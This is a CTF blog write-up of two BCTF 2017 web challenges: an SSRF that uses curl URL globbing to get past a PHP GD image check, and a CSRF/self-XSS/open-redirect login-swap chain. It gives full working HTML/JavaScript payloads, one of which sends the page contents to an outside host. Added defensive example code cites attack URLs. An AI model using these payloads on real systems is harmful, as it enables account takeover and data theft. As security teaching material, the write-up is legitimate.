LoRexxar's Blog

bctf2017 web writeup (partial)

2017/04/18

I played a round of bctf over the weekend. Because I went out on Saturday I could not get through all of the web challenges, which is a pity. For now I am writing up the two web challenges by 火日聚聚 that I have already solved; the others will follow later.


paint


The challenge opens on a drawing board. Besides the basic drawing functions it also lets you upload image files. A quick look around the site shows only two points worth examining: image.php and upload.php.

First upload.php. It accepts any file, but the extension has to be an image extension (this looks like a whitelist), and the file is renamed after upload. The most important detail: the server has configured the upload directory so that any file with a .php extension returns 403 directly, which already hints at the vulnerability class to come.

The page source (right click, view source) gives a hint: the flag is in flag.php.

Then image.php. It takes a url parameter directly. The url first goes through a basic check (probably a regex): only http or https urls are allowed, and the string 127.0.0.1 may not appear. The server then fetches the target with curl and runs the response through PHP's GD library. If GD accepts it as an image, the address of the saved image is returned; otherwise it returns the length of curl's response and "not image".

So we point a domain name of our own at 127.0.0.1 and request flag.php.


The returned length is 374.


Requesting the page directly gives a length of 80, so the picture is clear: we do not need to read local files, we only need to obtain the contents of the internal flag.php.

With the target fixed, the key question is how to exploit it.

To get the response body out of this SSRF, the response must pass the GD check, i.e. GD must accept it as an image; then we can request the saved image and read the result.

There is a small trick here.


By crafting the url, curl can be made to request several pages and concatenate the responses. Split an image into three parts, upload the first and the third, and put flag.php in the middle; GD then believes it received a whole image, and we get the result.

Final payload

http://xxxxxx/uploads/{149232828259FrA52FJy.gif,flag.php,149232828365div3po3O.gif}

In practice it is not quite that simple, because PHP GD does not just write the fetched bytes into an image; it re-processes the image. For jpg the content is altered too much; gif fares much better, and the image's exif/metadata section is left untouched by the processing. So the goal is to write the contents of flag.php into that section without corrupting the image.
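A defender-side counterpart to the two checks image.php got wrong, as an added example that is not the challenge's own code: screening the fetch target on the addresses the hostname actually resolves to (a substring test for 127.0.0.1 is defeated by pointing any domain at it) and refusing curl's {a,b,c} brace expansion outright. It assumes the caller has already resolved the hostname once (e.g. dns.promises.lookup with { all: true }) and passes every answer in; the URLs and address lists below are constructed.

```javascript
// Added example, not the challenge's code: screen a user-supplied fetch URL on the
// addresses it resolves to, and refuse curl's {a,b,c} / [1-3] globbing outright.

// Ranges a server-side fetcher must never reach (RFC 1918, loopback, link-local, "this").
const BLOCKED_V4 = [['10.0.0.0', 8], ['127.0.0.0', 8], ['169.254.0.0', 16],
                    ['172.16.0.0', 12], ['192.168.0.0', 16], ['0.0.0.0', 8]];
const V4 = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;

function ipv4ToInt(ip) {
  const m = V4.exec(ip);
  if (!m) return null;
  const octets = m.slice(1).map(Number);
  if (octets.some(o => o > 255)) return null;
  return octets.reduce((acc, o) => (acc << 8) + o, 0) >>> 0;
}

// Expects addresses in the text form dns.lookup returns (mapped IPv4 as ::ffff:a.b.c.d).
function inBlockedRange(ip) {
  if (ip.includes(':')) {
    const v6 = ip.toLowerCase();
    if (v6 === '::1' || v6 === '::' || /^(fc|fd|fe80)/.test(v6)) return true;
    const mapped = v6.match(/^::ffff:(\d+\.\d+\.\d+\.\d+)$/);
    return mapped ? inBlockedRange(mapped[1]) : false;
  }
  const n = ipv4ToInt(ip);
  if (n === null) return true;              // not a plain dotted quad: refuse
  return BLOCKED_V4.some(([base, bits]) => {
    const mask = (0xffffffff << (32 - bits)) >>> 0;
    return (n & mask) === (ipv4ToInt(base) & mask);
  });
}

// resolvedAddrs: every A/AAAA answer for the hostname, resolved once by the caller;
// the fetcher must then connect to exactly these (no second lookup, no redirects).
function checkFetchTarget(urlString, resolvedAddrs) {
  if (/[{}\[\]]/.test(urlString)) return { ok: false, reason: 'glob characters' };
  let url;
  try { url = new URL(urlString); } catch (e) { return { ok: false, reason: 'unparseable' }; }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return { ok: false, reason: 'scheme' };
  if (url.username || url.password) return { ok: false, reason: 'credentials in url' };
  if (resolvedAddrs.length === 0) return { ok: false, reason: 'unresolvable host' };
  const bad = resolvedAddrs.find(inBlockedRange);
  if (bad) return { ok: false, reason: 'resolves to ' + bad };
  return { ok: true, host: url.hostname, pinned: resolvedAddrs };
}

// Constructed cases: the write-up's brace-glob payload and a domain resolving to loopback.
console.log(checkFetchTarget('http://attacker.example/uploads/{a.gif,flag.php,b.gif}', ['203.0.113.5']));
console.log(checkFetchTarget('http://attacker.example/pic.gif', ['127.0.0.1']));
console.log(checkFetchTarget('http://images.example/cat.gif', ['203.0.113.5']));
```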

I also found some related articles:

http://www.freebuf.com/articles/web/54086.html

https://github.com/RickGray/Bypass-PHP-GD-Process-To-RCE

The image that finally worked:


diary

This is an xss challenge with a very clever idea. Let's look at it from the beginning.


By chance I found the original article describing a similar technique:

https://whitton.io/articles/uber-turning-self-xss-into-good-xss/

Someone in China translated the article, though sadly wooyun is gone:
http://www.vuln.cn/6530

Now let's analyse the challenge.

csrf

The challenge starts at http://diary.bctf.xctf.org.cn/

After registering and logging in, you notice that the login is OAuth2-style: the diary domain goes to the auth domain to request a callback code, then returns to diary with the login completed.

diary and auth are two separate domains and therefore have two separate sessions. There is a hidden condition here: the login request does not carry a csrftoken, so CSRF is possible.

self-xss

After logging in there are a few features. The first is diary, where you can edit something like a description. There is a self-XSS here, but a rather special one.

User input sent in a modified request (edited in an intercepting proxy) is not filtered at all on the server, but when it is read back and inserted into the page it passes through one round of front-end filtering.

The filter function is complex, but a few points matter. The first concerns the img filter:


img tags may not have any attribute whose name starts with on.

Then there is the tag blacklist:


A careful look shows that the iframe tag is not actually filtered, and via the srcdoc attribute you can create a same-origin child window, inside which arbitrary js can be written.

payload

<iframe srcdoc="<script>alert(1);</script>">
</iframe>
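Why the front-end filter above lets iframe srcdoc through, shown as an added example that is not the challenge's filter: a blacklist walker that drops forbidden tags and on* attributes never looks inside an attribute string, so markup carried in srcdoc survives, whereas an allowlist of tags and per-tag attributes drops the element altogether. The element objects stand in for a parsed DOM tree and are constructed here; the tag and attribute lists are assumptions.

```javascript
// Added example, not the challenge's filter. Nodes are plain objects standing in for
// a parsed DOM tree: { tag, attrs, children }.

const BLACKLISTED_TAGS = new Set(['script', 'object', 'embed', 'svg', 'style', 'link', 'meta']);

// Blacklist walker in the style the write-up describes: drop forbidden tags, strip on*
// handlers from img, recurse. srcdoc is just an attribute string to this walker, so the
// <script> inside it is never visited, and iframe itself is not on the list.
function blacklistFilter(node) {
  if (BLACKLISTED_TAGS.has(node.tag)) return null;
  const attrs = {};
  for (const [name, value] of Object.entries(node.attrs)) {
    if (node.tag === 'img' && /^on/i.test(name)) continue;
    attrs[name] = value;
  }
  return { tag: node.tag, attrs, children: node.children.map(blacklistFilter).filter(Boolean) };
}

// Allowlist: only known-inert tags survive, each with only its known-inert attributes,
// and URL-valued attributes may not carry a script-capable scheme.
const ALLOWED = { div: [], p: [], b: [], i: [], a: ['href'], img: ['src', 'alt'] };

function allowlistFilter(node) {
  const allowedAttrs = ALLOWED[node.tag];
  if (!allowedAttrs) return null;                 // iframe, script, ... all end here
  const attrs = {};
  for (const [name, value] of Object.entries(node.attrs)) {
    if (!allowedAttrs.includes(name.toLowerCase())) continue;
    if (/^\s*(javascript|vbscript|data):/i.test(value)) continue;
    attrs[name] = value;
  }
  return { tag: node.tag, attrs, children: node.children.map(allowlistFilter).filter(Boolean) };
}

// Does any surviving node still carry executable markup (script tag, on* handler,
// or an attribute value embedding <script or javascript:)?
function containsScriptMarkup(node) {
  if (!node) return false;
  if (node.tag === 'script') return true;
  for (const [name, value] of Object.entries(node.attrs)) {
    if (/^on/i.test(name) || /<script|javascript:/i.test(value)) return true;
  }
  return node.children.some(containsScriptMarkup);
}

// Constructed input: the parsed form of the write-up's payload plus an img with a handler.
const PAYLOAD_TREE = { tag: 'div', attrs: {}, children: [
  { tag: 'iframe', attrs: { srcdoc: '<script>alert(1);</script>' }, children: [] },
  { tag: 'img', attrs: { src: 'x', onerror: 'alert(2)' }, children: [] },
] };

console.log(containsScriptMarkup(blacklistFilter(PAYLOAD_TREE)));  // true: srcdoc survived
console.log(containsScriptMarkup(allowlistFilter(PAYLOAD_TREE)));  // false
```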

It works. Let's keep looking at the site.

Target

survey is a form; submitting anything at all returns

Thank you. But the boss said only admin can get the flag after he finishes this survey, XD

So that is our target. Note that the survey submission does carry a csrftoken, so there is no CSRF here.

Admin review

Then there is the report bug feature; submitting an arbitrary url returns

We only care about the problem from this website (http://diary.bctf.xctf.org.cn)!

But looking at the site as a whole, it is clearly written in django, and a little testing shows an open redirect in the static file handler:

http://diary.bctf.xctf.org.cn/static/%5C%5C119.29.192.14/bctf2017/xss/xss.html

This redirects to the target site.

Putting the attack together

Combining the original article with the vulnerabilities found above, the whole attack chain follows.

1. Submit an external link carrying the payload; the open redirect bypasses the url check, and the admin visits it.
2. When the admin visits, log them out of the diary domain while keeping the auth domain session.
3. The bot logs in with a token we prepared in advance (this step can be done dynamically) and visits the diary page we prepared.
4. The diary page holds js injected beforehand via iframe. When the bot visits, first open a new iframe child window that logs out the current account, then visit login to log back in as the bot's own account.
5. Once that finishes, open another iframe child window, visit survey, write data into the suggestion box and click submit.
6. Once that finishes, read the child window's contents and redirect to the place that receives the flag.

With the idea clear, all that remains is writing the payload.

Final payload

First xss1.html, i.e. the first three steps above:

<meta http-equiv="Content-Security-Policy" content="img-src http://diary.bctf.xctf.org.cn">
<img src="http://diary.bctf.xctf.org.cn/accounts/logout/" onerror="login();">
<script>
var login = function() {
var loginImg = document.createElement('img');
loginImg.src = 'http://diary.bctf.xctf.org.cn/accounts/login/';
loginImg.onerror = redir;
}
// log in with our code
var redir = function() {
var code = "kAj32I0LE2KETl5ZHS6FFRJohsE4LA";
var loginImg2 = document.createElement('img');
loginImg2.src = 'http://diary.bctf.xctf.org.cn/o/receive_authcode?state=preauth&code=' + code;
loginImg2.onerror = function() {
window.location = 'http://diary.bctf.xctf.org.cn/diary/';
}
}
</script>

Then xss2.html, the fourth step mentioned above:

<meta http-equiv="Content-Security-Policy" content="img-src http://diary.bctf.xctf.org.cn">
<img src="http://diary.bctf.xctf.org.cn/accounts/logout/" onerror="redir();">
<script>
var redir = function() {
window.location = 'http://diary.bctf.xctf.org.cn/accounts/login/';
};
</script>

Finally, the payload that completes the attack:

<iframe src='http://119.29.192.14/bctf2017/xss/xss2.html'>
</iframe>
<script>
setTimeout(function() {
var profileIframe = document.createElement('iframe');
profileIframe.setAttribute('src', 'http://diary.bctf.xctf.org.cn/survey/');
profileIframe.setAttribute('id', 'survey');
document.body.appendChild(profileIframe);
profileIframe.onload = function() {
document.getElementById('survey').contentWindow.document.forms[0].suggestion.value='give me flag';
document.getElementById('survey').contentWindow.document.forms[0].submit();
setTimeout('location.href=\'//xxx?flag=\'+document.getElementById(\'survey\').contentWindow.document.body.innerHTML;', 3000);
}
}, 5000);
</script>


After submitting and waiting a moment, the response arrived successfully.

